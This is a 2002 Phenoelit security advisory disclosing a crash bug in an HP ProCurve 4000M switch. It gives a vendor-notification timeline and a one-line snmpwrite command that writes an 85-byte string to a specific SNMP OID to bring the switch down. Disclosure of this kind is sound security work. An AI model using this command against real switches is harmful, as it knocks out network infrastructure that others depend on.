Phenoelit Advisory [ Authors ] FX kim0 Zet Phenoelit Group (http://www.phenoelit.de) Advisory http://www.phenoelit.de/stuff/HP_ProCurve.txt [ Affected Products ] Hewlett Packard (HP) ProCurve Switch Tested on HP J4121A ProCurve Switch 4000M revision C.07.23, ROM C.06.01 HP Bug ID: Not assigned [ Vendor communication ] 06/29/02 Initial Notification, security-alert@hp.com *Note-Initial notification by phenoelit includes a cc to cert@cert.org by default 06/29/02 RBL blocked delivery to security-alert@hp.com 06/29/02 Creation of ho-mail account and resend 07/29/02 Auto-responder reply 07/02/02 Human confirmation, PGP exchange and ack. 07/19/02 Notification of intent to post publically in apx. 7 days. 07/23/02 Coordination for release date/times [ Overview ] HP ProCurve Switches are the current offering in the switch market from Hewlett Packard. [ Description ] SNMP variable accessible by SNMP WRITE with 85 characters crashes the ProCurve Switch upon next connect to the TELNET or HTTP Port (.iso.3.6.1.4.1.11.2.36.1.1.2.1.0) [ Example ] linux# snmpwrite private .iso.3.6.1.4.1.11.2.36.1.1.2.1.0 \ s `perl -e 'print "A"x85;'` [ Solution ] None known at this time. [ end of file ]